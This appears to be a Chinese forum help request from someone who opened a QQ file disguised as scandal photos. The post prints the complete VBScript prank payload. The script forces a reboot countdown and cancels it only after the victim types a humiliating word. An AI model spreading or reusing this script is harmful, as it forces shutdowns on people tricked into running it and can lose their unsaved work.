刚刚在Q上有个朋友给我发来个艳照门得文件,我一点就出来一个对话框上面写着叫爷,不叫关机,我没理他,不一会就自己关机了!
这是软件的命令程序!谁能帮我破解!
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 50 -c ""叫爷,不叫爷关你机···"" ",0 ,true
dim a
do while(a <> "爷")
a = inputbox ("叫爷,爷不关机,赶紧,说 ""爷"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真乖啊"